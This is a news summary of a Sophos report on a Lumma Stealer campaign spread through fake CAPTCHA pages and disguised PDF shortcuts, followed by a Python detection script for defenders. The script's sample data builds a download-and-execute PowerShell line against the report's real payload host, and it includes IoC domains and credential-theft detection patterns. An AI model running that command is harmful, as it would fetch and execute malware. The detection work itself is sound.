
Sophos X-Ops has uncovered a cunning cybercrime campaign using fake CAPTCHA pages to trick users into running PowerShell commands—unknowingly launching the notorious Lumma Stealer malware.
“Lumma Stealer remains a significant threat as of this writing,” Sophos notes, “and the tactic of using fake CAPTCHA sites to lull victims into entering a malicious command… is an ugly twist on the situation.”
Lumma Stealer is a well-known Malware-as-a-Service (MaaS) offering sold via Telegram, originating from Russian-speaking developers. It targets sensitive data like browser passwords, cookies, cryptocurrency wallets, and session tokens.
The attack begins innocuously. Users are directed to a seemingly legitimate CAPTCHA site—like hxxps://camplytic[.]com/go/…—and are asked to verify they are human. Next, victims are guided to press Ctrl + V and Enter in the Windows Run dialog, unknowingly executing a base64-encoded PowerShell payload that the page has already placed on their clipboard.
“The PowerShell command… triggers a concealed JavaScript function that drops a PowerShell script onto the Clipboard and runs it in a hidden window.”
This script downloads additional code from: hxxps://fixedzip.oss-ap-southeast-5.aliyuncs.com/new-artist.txt.

It then proceeds to retrieve a ZIP archive containing the Lumma Stealer binary—ArtistSponsorship.exe—which drops multiple files and executes a heavily obfuscated AutoIt script.
The AutoIt script connects to C2 infrastructure at snail-r1ced[.]cyou, and begins its data theft operations. It targets Chrome login credentials, cookies, and user data. Sophos observed a 6.37MB file of stolen data exfiltrated to this C2 server.
“AutoIt3.exe is accessing login data and cookies used by the Chrome browser,” Sophos researchers documented.
A second delivery method mimics a PDF download. The file appears as Instruction_695-18014-012_Rev.PDF, but is actually a .lnk shortcut file executing an obfuscated PowerShell script that, again, fetches and loads further payloads using mshta.exe.
This malicious script unpacks AES-encrypted data, decodes it with CyberChef, and dynamically loads a PE file into memory. The PE’s static method aHdiNKuWlR downloads additional scripts and, ironically, even opens a real IRS PDF—a clever decoy to mask the breach.
Sophos’ deep dive revealed the final stage as a heavily obfuscated PowerShell script that dynamically resolves low-level Windows APIs like VirtualProtect and AmsiInitialize, further highlighting the advanced evasive techniques used by the malware authors.
Sophos recommends checking known Indicators of Compromise (IoCs), monitoring file and process activity, and reviewing browser history for fake CAPTCHA URLs. Detection may be aided by EDR tools that correlate file creation, process behavior, and suspicious clipboard events.
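To make those recommendations concrete, the following is an added detection example (not Sophos' code and not part of the report) that applies the chain described above to constructed telemetry: it decodes a `-EncodedCommand` PowerShell payload launched from explorer.exe (the Run-dialog paste pattern), matches the report's three IoC domains against command lines and browser history, flags PowerShell spawning mshta.exe, and flags AutoIt3.exe touching Chrome's Login Data or Cookies stores. The event schema (`event_type`, `image`, `parent_image`, `command_line`, `target_file`), the sample events, the `.invalid` stage host and the history path are all assumptions constructed for the example; only the three domains come from the report.

```python
"""Hunting helper for the fake-CAPTCHA -> PowerShell -> Lumma Stealer chain (added example)."""
import base64
import re
from urllib.parse import urlparse

# IoC domains quoted in the report (defanged there; plain here for matching).
IOC_DOMAINS = {
    "camplytic.com",
    "fixedzip.oss-ap-southeast-5.aliyuncs.com",
    "snail-r1ced.cyou",
}

# PowerShell's -EncodedCommand (and its abbreviations) carries base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-(?:windowstyle|win|w)\s+hidden", re.IGNORECASE)
# Chrome secret stores the report says AutoIt3.exe reads.
CHROME_SECRETS_RE = re.compile(r"\\User Data\\.*\\(Login Data|Cookies|Network\\Cookies)$", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def domains_in(text):
    return {d for d in IOC_DOMAINS if d in text.lower()}


def analyze_event(ev):
    """Apply the chain-specific rules to one event; return a list of finding strings."""
    findings = []
    image = ev.get("image", "").lower()
    parent = ev.get("parent_image", "").lower()
    cmd = ev.get("command_line", "")
    if ev.get("event_type") == "process_create":
        if image.endswith("powershell.exe"):
            decoded = decode_encoded_command(cmd)
            # Run dialog paste: explorer.exe is the parent, window hidden or payload encoded.
            if parent.endswith("explorer.exe") and (decoded or HIDDEN_RE.search(cmd)):
                findings.append("explorer.exe spawned hidden/encoded PowerShell (Run-dialog paste pattern)")
            for d in sorted(domains_in(cmd) | domains_in(decoded or "")):
                findings.append(f"known Lumma IoC domain in PowerShell command: {d}")
        if image.endswith("mshta.exe") and parent.endswith("powershell.exe"):
            findings.append("PowerShell launched mshta.exe (LOLBin stage loader)")
    elif ev.get("event_type") == "file_access":
        if image.endswith("autoit3.exe") and CHROME_SECRETS_RE.search(ev.get("target_file", "")):
            findings.append(f"AutoIt3.exe read Chrome secret store: {ev['target_file']}")
    return findings


def scan(events):
    """Map event index -> findings for every event that triggered at least one rule."""
    return {i: f for i, ev in enumerate(events) if (f := analyze_event(ev))}


def check_browser_history(urls):
    """Return history URLs whose host is (or is under) a known IoC domain."""
    hits = []
    for u in urls:
        host = (urlparse(u).hostname or "").lower()
        if host in IOC_DOMAINS or any(host.endswith("." + d) for d in IOC_DOMAINS):
            hits.append(u)
    return hits


# Constructed sample telemetry (hypothetical Sysmon-style events; not from the report).
STAGE1 = "iex (iwr 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/new-artist.txt').Content"
ENC = base64.b64encode(STAGE1.encode("utf-16le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"event_type": "process_create", "image": PS, "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": f"powershell.exe -w hidden -enc {ENC}"},
    {"event_type": "process_create", "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": PS,
     "command_line": "mshta.exe https://stage-host.invalid/loader.hta"},  # constructed host
    {"event_type": "file_access", "image": "C:\\Users\\victim\\AppData\\Local\\Temp\\AutoIt3.exe",
     "target_file": "C:\\Users\\victim\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"},
    {"event_type": "process_create", "image": PS, "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "powershell.exe Get-Date"},  # benign admin use, should not fire
]
SAMPLE_HISTORY = [
    "https://www.example.com/docs",
    "https://camplytic.com/go/CONSTRUCTED-PATH",  # report's domain, constructed path
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        for f in findings:
            print(f"event {idx}: {f}")
    for u in check_browser_history(SAMPLE_HISTORY):
        print(f"history hit: {u}")
```

The benign fourth event shows why the rules key on parent process and window state rather than on powershell.exe alone; in production the same logic would read real EDR or Sysmon exports, and the IoC set would be refreshed from the vendor's published list.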
“Educating users to mistrust CAPTCHAs, after so many years of convincing them to answer them, is a heavy lift,” the report cautions.